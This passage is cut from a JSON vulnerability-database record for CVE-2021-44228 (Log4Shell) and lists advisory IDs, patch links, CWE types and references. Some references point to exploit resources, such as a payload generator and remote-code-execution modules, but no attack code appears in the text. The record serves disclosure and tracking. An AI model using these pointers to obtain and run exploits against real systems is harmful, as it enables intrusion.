To modify your subscription or unsubscribe please visit https://lists.vmware.com/mailman/listinfo/security-announce", "sources": [ { "db": "NVD", "id": "CVE-2021-44228" }, { "db": "VULHUB", "id": "VHN-407408" }, { "db": "VULMON", "id": "CVE-2021-44228" }, { "db": "PACKETSTORM", "id": "165295" }, { "db": "PACKETSTORM", "id": "165286" }, { "db": "PACKETSTORM", "id": "165287" }, { "db": "PACKETSTORM", "id": "165288" }, { "db": "PACKETSTORM", "id": "165289" }, { "db": "PACKETSTORM", "id": "165297" }, { "db": "PACKETSTORM", "id": "165298" }, { "db": "PACKETSTORM", "id": "165324" }, { "db": "PACKETSTORM", "id": "165329" }, { "db": "PACKETSTORM", "id": "165348" }, { "db": "PACKETSTORM", "id": "165632" }, { "db": "PACKETSTORM", "id": "165371" } ], "trust": 2.16 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-407408", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-407408" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-44228", "trust": 3.0 }, { "db": "PACKETSTORM", "id": "165371", "trust": 1.8 }, { "db": "PACKETSTORM", "id": "165311", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165225", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165532", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165281", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165306", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165260", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165673", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165282", "trust": 1.7 }, { "db": "PACKETSTORM", "id": 
"167794", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "167917", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165270", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165261", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165642", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "165307", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-479842", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-714170", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-661247", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-397453", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/12/13/1", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/12/14/4", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/12/10/3", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/12/13/2", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/12/10/2", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/12/15/3", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/12/10/1", "trust": 1.7 }, { "db": "CERT/CC", "id": "VU#930724", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "171626", "trust": 1.6 }, { "db": "PACKETSTORM", "id": "165324", "trust": 0.8 }, { "db": "PACKETSTORM", "id": "165348", "trust": 0.8 }, { "db": "PACKETSTORM", "id": "165733", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "166313", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "165279", "trust": 0.7 }, { "db": "EXPLOIT-DB", "id": "50592", "trust": 0.7 }, { "db": "CS-HELP", "id": "SB2022060708", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022012045", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022010629", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022072076", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022021428", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022071316", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022062001", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021122212", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022010908", "trust": 0.6 }, { "db": "CS-HELP", "id": 
"SB2021122403", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021121720", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021123016", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022010421", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022031501", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021122907", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022012732", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021121652", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021121492", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022010522", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021121201", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021121535", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021122721", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021122018", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022032006", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022060808", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022011732", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021122401", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021121350", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022030923", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021122811", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022020607", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022012439", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022011042", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022021807", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022010322", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021122122", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0090", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0492", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4211", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4187.6", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0237", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4236", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0332", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0080", "trust": 0.6 }, { "db": "AUSCERT", 
"id": "ESB-2021.4186.4", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4269", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4198", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4316", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4274", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0247", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.1188", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4302.3", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4256.2", "trust": 0.6 }, { "db": "CXSECURITY", "id": "WLB-2022120027", "trust": 0.6 }, { "db": "CXSECURITY", "id": "WLB-2021120069", "trust": 0.6 }, { "db": "CXSECURITY", "id": "WLB-2022080025", "trust": 0.6 }, { "db": "CXSECURITY", "id": "WLB-2022010065", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-76573", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-21-357-02", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-034-01", "trust": 0.6 }, { "db": "EXPLOIT-DB", "id": "51183", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202112-799", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "165329", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "165295", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "165297", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "165298", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "165289", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "165632", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "165293", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165343", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165333", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165520", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165285", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165290", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165291", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165326", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165264", "trust": 0.1 }, { "db": "EXPLOIT-DB", "id": "50590", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-407408", "trust": 0.1 }, { "db": "VULMON", "id": 
"CVE-2021-44228", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165286", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165287", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "165288", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-407408" }, { "db": "VULMON", "id": "CVE-2021-44228" }, { "db": "PACKETSTORM", "id": "165295" }, { "db": "PACKETSTORM", "id": "165286" }, { "db": "PACKETSTORM", "id": "165287" }, { "db": "PACKETSTORM", "id": "165288" }, { "db": "PACKETSTORM", "id": "165289" }, { "db": "PACKETSTORM", "id": "165297" }, { "db": "PACKETSTORM", "id": "165298" }, { "db": "PACKETSTORM", "id": "165324" }, { "db": "PACKETSTORM", "id": "165329" }, { "db": "PACKETSTORM", "id": "165348" }, { "db": "PACKETSTORM", "id": "165632" }, { "db": "PACKETSTORM", "id": "165371" }, { "db": "CNNVD", "id": "CNNVD-202112-799" }, { "db": "NVD", "id": "CVE-2021-44228" } ] }, "id": "VAR-202112-0566", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-407408" } ], "trust": 0.7188405714285715 }, "last_update_date": "2024-11-29T19:32:10.142000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Apache Log4j Fixes for code issue vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=174249" }, { "title": "Debian CVElist Bug Report Logs: apache-log4j2: CVE-2021-44228: Remote code injection via crafted log messages", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=4eae9b09b97da57f4ca6103cc85ed4da" }, { "title": "Debian CVElist Bug Report Logs: apache-log4j2: CVE-2021-45046: Incomplete fix for CVE-2021-44228 in certain non-default 
configurations", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=b88a8ce4fc53c3a45830bc6bbde8b01c" }, { "title": "Debian Security Advisories: DSA-5020-1 apache-log4j2 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=24c79c59809a2c5bcddc81889b23a6bc" }, { "title": "Debian Security Advisories: DSA-5022-1 apache-log4j2 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=5ba53229ef5f408ed29126bd4f624def" }, { "title": "IBM: Security Bulletin: There is vulnerability in Apache Log4j used by Content Manager OnDemand z/OS. Content Manager OnDemand z/OS has addressed the applicable CVE [CVE-2021-44228]", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=dbdfcf9d51b60adf542d500e515b9ba8" }, { "title": "Red Hat: CVE-2021-44228", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-44228" }, { "title": "IBM: An update on the Apache Log4j 2.x vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=0648a3f00f067d373b069c4f2acd5db4" }, { "title": "Amazon Linux AMI: ALAS-2021-1553", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2021-1553" }, { "title": "IBM: Security Bulletin: IBM Cloud Pak System is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-45046, CVE-2021-44228)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c8b40ff47e1d31bee8b0fbdbdd4fe212" }, { "title": "IBM: Security Bulletin: IBM Cloud Pak System is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-45046, CVE-2021-44228)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=654a4f5a7bd1fdfd229558535923710b" }, { "title": "Amazon Linux 2: 
ALAS2-2021-1731", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1731" }, { "title": "Amazon Linux 2: ALAS2-2021-1730", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1730" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-44228 log" }, { "title": "", "trust": 0.1, "url": "https://github.com/canarieids/Zeek-Ubuntu-22.04 " }, { "title": "", "trust": 0.1, "url": "https://github.com/f5devcentral/f5-professional-services " }, { "title": "Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet", "trust": 0.1, "url": "https://github.com/thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet " }, { "title": "spring-on-k8s", "trust": 0.1, "url": "https://github.com/AndriyKalashnykov/spring-on-k8s " }, { "title": "jaygooby", "trust": 0.1, "url": "https://github.com/jaygooby/jaygooby " }, { "title": "log4j-log4shell-playground", "trust": 0.1, "url": "https://github.com/rgl/log4j-log4shell-playground " }, { "title": "Log4j", "trust": 0.1, "url": "https://github.com/kaganoglu/Log4j " }, { "title": "trivy-cve-scan", "trust": 0.1, "url": "https://github.com/broadinstitute/trivy-cve-scan " }, { "title": "test-44228", "trust": 0.1, "url": "https://github.com/datadavev/test-44228 " }, { "title": "cve-2021-44228-helpers", "trust": 0.1, "url": "https://github.com/uint0/cve-2021-44228-helpers " }, { "title": "log4j-vendor-list", "trust": 0.1, "url": "https://github.com/bizzarecontacts/log4j-vendor-list " }, { "title": "", "trust": 0.1, "url": "https://github.com/Live-Hack-CVE/CVE-2021-44228 " }, { "title": "log4shell", "trust": 0.1, "url": "https://github.com/0xsyr0/log4shell " }, { "title": "cve-2021-44228-qingteng-online-patch", "trust": 0.1, "url": "https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch " }, { "title": "cve-2021-44228", "trust": 0.1, "url": 
"https://github.com/corelight/cve-2021-44228 " }, { "title": "Log4Shell-IOCs", "trust": 0.1, "url": "https://github.com/curated-intel/Log4Shell-IOCs " }, { "title": "Sitecore.Solr-log4j-mitigation", "trust": 0.1, "url": "https://github.com/avwolferen/Sitecore.Solr-log4j-mitigation " }, { "title": "check-log4j", "trust": 0.1, "url": "https://github.com/yahoo/check-log4j " } ], "sources": [ { "db": "VULMON", "id": "CVE-2021-44228" }, { "db": "CNNVD", "id": "CNNVD-202112-799" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.1 }, { "problemtype": "CWE-400", "trust": 1.1 }, { "problemtype": "CWE-502", "trust": 1.1 }, { "problemtype": "CWE-917", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-407408" }, { "db": "NVD", "id": "CVE-2021-44228" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-log4j-qruknebd" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/167917/mobileiron-log4shell-remote-command-execution.html" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/165225/apache-log4j2-2.14.1-remote-code-execution.html" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/165311/log4j-scan-extensive-scanner.html" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/165371/vmware-security-advisory-2021-0028.4.html" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/165532/log4shell-http-header-injection.html" }, { "trust": 2.3, "url": 
"http://packetstormsecurity.com/files/165642/vmware-vcenter-server-unauthenticated-log4shell-jndi-injection-remote-code-execution.html" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/165673/unifi-network-application-unauthenticated-log4shell-remote-code-execution.html" }, { "trust": 1.7, "url": "https://www.kb.cert.org/vuls/id/930724" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf" }, { "trust": 1.7, "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2021-0032" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20211210-0007/" }, { "trust": 1.7, "url": "https://support.apple.com/kb/ht213189" }, { "trust": 1.7, "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html" }, { "trust": 1.7, "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html" }, { "trust": 1.7, "url": "https://www.debian.org/security/2021/dsa-5020" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2022/mar/23" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2022/jul/11" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2022/dec/2" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/167794/open-xchange-app-suite-7.10.x-cross-site-scripting-command-injection.html" }, { "trust": 1.7, "url": "https://github.com/nu11secur1ty/cve-mitre/tree/main/cve-2021-44228" }, { "trust": 1.7, "url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/165260/vmware-security-advisory-2021-0028.html" }, { "trust": 1.7, "url": 
"http://packetstormsecurity.com/files/165261/apache-log4j2-2.14.1-information-disclosure.html" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/165270/apache-log4j2-2.14.1-remote-code-execution.html" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/165281/log4j2-log4shell-regexes.html" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/165282/log4j-payload-generator.html" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/165306/l4sh-log4j-remote-code-execution.html" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/165307/log4j-remote-code-execution-word-bypassing.html" }, { "trust": 1.7, "url": "https://github.com/cisagov/log4j-affected-db/blob/develop/software-list.md" }, { "trust": 1.7, "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "trust": 1.7, "url": "https://twitter.com/kurtseifried/status/1469345530182455296" }, { "trust": 1.7, "url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001" }, { "trust": 1.7, "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "trust": 1.7, "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "trust": 1.7, "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/12/10/3" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/12/13/1" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/12/13/2" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/12/15/3" }, { "trust": 1.7, "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/" }, { 
"trust": 1.6, "url": "http://packetstormsecurity.com/files/171626/ad-manager-plus-7122-remote-code-execution.html" }, { "trust": 1.5, "url": "https://access.redhat.com/security/cve/cve-2021-44228" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44228" }, { "trust": 1.1, "url": "https://github.com/cisagov/log4j-affected-db" }, { "trust": 1.0, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/m5csvunv4hwzzxgoknsk6l7rpm7bokib/" }, { "trust": 1.0, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/vu57ujdcfiasio35gc55jmksrxjmcdfm/" }, { "trust": 0.9, "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009" }, { "trust": 0.9, "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.9, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.9, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/m5csvunv4hwzzxgoknsk6l7rpm7bokib/" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/vu57ujdcfiasio35gc55jmksrxjmcdfm/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022010908" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022060808" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022010629" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022072076" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/165733/red-hat-security-advisory-2022-0296-03.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6527216" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4186.4" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4316" }, { "trust": 0.6, "url": 
"https://www.auscert.org.au/bulletins/esb-2022.0080" }, { "trust": 0.6, "url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-44228" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6528268" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021122212" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022012732" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021121201" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4302.3" }, { "trust": 0.6, "url": "https://www.exploit-db.com/exploits/50592" }, { "trust": 0.6, "url": "https://cxsecurity.com/issue/wlb-2022080025" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022011042" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021121720" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021122018" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0237" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021122811" }, { "trust": 0.6, "url": "https://cxsecurity.com/issue/wlb-2022010065" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021122401" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022011732" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022021807" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/165324/ubuntu-security-notice-usn-5197-1.html" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021123016" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021121350" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4211" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021122122" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022062001" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021122403" }, { "trust": 0.6, 
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122721" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022010522" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022010322" }, { "trust": 0.6, "url": "https://cxsecurity.com/issue/wlb-2022120027" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6525816" }, { "trust": 0.6, "url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20211215-01-log4j-cn" }, { "trust": 0.6, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-357-02" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021122907" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022060708" }, { "trust": 0.6, "url": "https://www.exploit-db.com/exploits/51183" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022021428" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/166313/apple-security-advisory-2022-03-14-7.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6526220" }, { "trust": 0.6, "url": "https://vigilance.fr/vulnerability/apache-log4j-code-execution-via-jndi-remote-class-injection-37049" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4269" }, { "trust": 0.6, "url": "https://support.apple.com/en-us/ht213189" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022012439" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022020607" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4256.2" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022071316" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022032006" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0332" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022030923" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.1188" }, { "trust": 0.6, "url": 
"https://www.auscert.org.au/bulletins/esb-2022.0492" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6526754" }, { "trust": 0.6, "url": "https://cxsecurity.com/issue/wlb-2021120069" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0090" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4236" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021121652" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6527330" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4198" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021121492" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4187.6" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022031501" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/165279/ubuntu-security-notice-usn-5192-1.html" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/165348/ubuntu-security-notice-usn-5192-2.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4274" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/product_security/len-76573" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022012045" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021121535" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022010421" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0247" }, { "trust": 0.6, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-034-01" }, { "trust": 0.5, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-3200" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2018-25013" }, { "trust": 0.3, "url": 
